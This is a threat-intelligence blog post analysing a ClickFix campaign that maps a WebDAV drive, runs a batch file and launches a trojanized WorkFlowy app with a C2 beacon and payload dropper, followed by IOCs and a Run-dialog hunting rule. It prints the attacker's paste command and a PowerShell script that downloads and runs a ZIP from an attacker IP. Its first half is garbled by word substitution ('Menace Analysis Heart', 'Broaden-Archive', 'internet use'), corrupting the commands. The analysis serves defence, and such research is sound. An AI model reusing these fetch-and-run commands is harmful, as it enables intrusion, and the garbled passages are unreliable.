Disclaimer: This report has been ready by the Menace Analysis Heart to boost cybersecurity consciousness and help the strengthening of protection capabilities. It’s primarily based on unbiased analysis and observations of the present menace panorama accessible on the time of publication. The content material is meant for informational and preparedness functions solely.
Learn extra blogs round menace intelligence and adversary analysis:
Abstract
Atos Researchers recognized a brand new variant of the favored ClickFix method, the place attackers persuade the consumer to execute a malicious command on their very own gadget by way of the Win + R shortcut. On this variation, a “net use” command is used to map a community drive from an exterior server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the respectable WorkFlowy utility with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the ultimate malware payload.
 |
| Determine 1: Excessive-level overview of assault movement. |
Assault overview
On this model, the preliminary vector of assault is identical as in all the opposite ones, an internet web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the consumer to open the Run utility through “Win+R”, adopted by “Ctrl+V” and “Enter”
 |
| Determine 2: Phishing web site 1 |
 |
| Determine 3: Phishing web site 2 |
This executes the next command:
“cmd.exe” /c internet use Z: http://94.156.170[.]255/webdav /persistent:no && “Z:update.cmd” & internet use Z: /deleteSometimes, at this stage, attackers have used PowerShell or mshta to obtain and execute the subsequent stage of the malware. Right here, as a substitute, we will see that “net use” is getting used to map and hook up with a community drive of an exterior server from which a Batch script is executed. Whereas not novel, these TTPs had been by no means seen in ClickFix assaults earlier than. Mixed with the subsequent unusual levels of an infection patterns, this marketing campaign provides Adversaries excessive possibilities to evade defensive controls and keep below the radar of defenders.
On this case, the noticed ClickFix variant of execution movement efficiently bypassed the detection of Microsoft Defender for Endpoint. Atos safety groups had been in a position to detect it solely due to the interior Menace Searching service specializing in the principle behavioral facet of the ClickFix method – preliminary execution by way of the RunMRU registry key (looking question accessible within the Appendix part).
The preliminary execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is eliminated. Content material of “update.cmd”:
begin "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile "$env:TEMPdl.zip";
Broaden-Archive "$env:TEMPdl.zip" -DestinationPath "$env:LOCALAPPDATAMyApp" -Pressure;
Begin-Course of "$env:LOCALAPPDATAMyAppWorkFlowy.exe""This spawns a PowerShell occasion which downloads a zipper archive and extracts it into “%LOCALAPPDATA%MyApp” listing. Then it executes “WorkFlowy.exe” binary.
 |
| Figure 4: Content of flowy.zip archive |
WorkFlowy analysis
The archive contains a WorkFlowy desktop application (version 1.4.1050), signed by the developer “FunRoutine Inc.”, distributed as an Electron application bundle. Electron applications are written using popular web technologies – HTML, CSS, and JavaScript – and use “.asar” archives to pack source code during application packing. It is done for various reasons, like mitigating issues around long path names on Windows. The malicious code was injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive.
Technical Profile
| Property | Value |
| Target application | WorkFlowy Desktop (Electron) |
| Malicious version | 1.4.1050 |
| Malicious file | resources/app.asar → /main.js |
| C2 domain | cloudflare.report/forever/e/ |
| C2 origin IP | 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) |
| Domain registered | January 2026, HK registrant, OnlineNIC registrar |
| Victim ID file | %APPDATA%id.txt |
| Dropper staging dir | %TEMP%[unix_timestamp] |
Infection Vector
The malicious ASAR archive is a direct replacement for the legitimate resources/app.asar. The attacker repackaged an older version of the app (v1.4 vs. the current v4.3) with injected code.
 |
| Figure 5: Content of “resources” subdirectory |
Malicious Code (Dropper/Beacon)
When WorkFlowy is executed, it looks for app.asar file in the relative path hardcoded into the binary. It then reads the main.js file from inside of it, decodes it to a string, and parses it to the embedded V8 Google JavaScript engine, which executes it. Attackers have replaced the legitimate main.js with one they have created themselves. Instead of well-structured scripts, they have used heavily obfuscated on-liner structure, adding malicious code on top of legitimate one, ensuring it is executed first and blocking WorkFlowy functionality.
Malicious code contains several critical functions:
- Malware executes before the legitimate application starts: The injected IIFE opens with await f() — the infinite C2 beacon loop. Because f() never resolves, all legitimate WorkFlowy initialization code that follows is permanently blocked. The malware runs with full Node.js privileges immediately on launch.
- Persistent victim fingerprinting via %APPDATA%id.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATA%id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
- C2 beacon — exfiltrates host identity every 2 seconds: Function u() sends an HTTP POST containing the victim’s unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.
- Remote payload download and execution: Function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec.
If the C2 connection is not established, no files or directories are generated. At the time of this analysis, the C2 domain was already unresponsive.
Why Electron is an Effective Delivery mechanism
The malicious code runs in the Node.js main process – outside the Chromium sandbox – with the full privileges of the logged-in user, allowing for the malicious code to execute any actions the user is allowed to do on the system. No files are actually written to disk, and since the malicious payload is packed inside “.asar” archive, it additionally helps to hide malicious code.
Persistence
No OS-level persistence is implemented via the dropper. The beacon runs only while WorkFlowy is open. The only artifact written to disk before next stage delivery is %APPDATA%id.txt (victim tracking ID), and that is only if the connection to C2 is established correctly. Presumably, an OS-level persistence is delegated to whatever payload the C2 delivers via the dropper.
Read more blogs around threat intelligence and adversary research:
Key takeaways
This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living‑off‑the‑land binaries that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts a remote WebDAV share as a local drive, executes a hosted batch file through standard filesystem semantics, and removes the mapping immediately after use. This shows that ClickFix still evolves, expanding its arsenal of proxy execution methods and starting to utilize native networking utilities.
The malicious logic is hidden by replacing the content of the Workflowy application’s app.asar archive with a trojanized version of main.js. Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file‑based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility.
This activity was not detected by security controls and was only identified through targeted threat hunting at Atos. Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog (recorded inside the RunMRU Registry Key). This underscores the growing importance of threat hunting as a complementary detection mechanism: as ClickFix campaigns shift toward native utilities and trusted applications that generate few alerts, only proactive, hypothesis-driven hunting can help surface these weak signals early enough to disrupt the attack chain.
Appendixes
IOCs
| Domain | cloudflare[.]report |
| Domain | happyglamper[.]ro |
| IP | 94[.]156[.]170[.]255 |
| IP | 144[.]31[.]165[.]173 |
| URL | https://cloudflare[.]report/forever/e/ |
| File | %APPDATA%id.txt |
| Path | %TEMP%[13-digit-timestamp] |
| SHA256 | a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) |
| SHA256 | 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – Older version of legitimate binary, not malicious) |
| SHA256 | dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js) |
Hunting Query
- title: Suspicious Commands executed via Run dialog
- id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
- status: experimental
- description:
- Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key (commonly used for Run dialog history), with explorer.exe as the initiating process.
- author: TRC
- date: 2026-03-05
- tags:
- – attack.execution
- – attack.t1059
- – attack.defense_evasion
- logsource:
- category: registry_set
- product: windows
- definition: “Sysmon Event ID 13 (Registry value set) or equivalent EDR registry telemetry”
- detection:
- selection_key:
- TargetObject|contains: ‘SOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU’
- selection_proc:
- Image|endswith: ‘explorer.exe’
- selection_data:
- Details|contains:
- – ‘cmd ‘
- – ‘powershell ‘
- – ‘cmd.exe ‘
- – ‘powershell.exe ‘
- – ‘wscript.exe ‘
- – ‘cscript.exe ‘
- – ‘net.exe ‘
- – ‘net1.exe ‘
- – ‘sh.exe ‘
- – ‘bash.exe ‘
- – ‘schtasks.exe ‘
- – ‘regsvr32.exe ‘
- – ‘hh.exe ‘
- – ‘wmic.exe ‘
- – ‘mshta.exe ‘
- – ‘rundll32.exe ‘
- – ‘msiexec.exe ‘
- – ‘forfiles.exe ‘
- – ‘scriptrunner.exe ‘
- – ‘mftrace.exe ‘
- – ‘AppVLP.exe ‘
- – ‘svchost.exe ‘
- – ‘msbuild.exe ‘
- condition: selection_key and selection_proc and selection_data
- falsepositives:
- – “Legitimate administrative activity using Run dialog (Win+R) to execute built-in tools.”
- – “IT scripts or troubleshooting steps executed interactively by a user.”
- level: medium
Read more blogs around threat intelligence and adversary research:
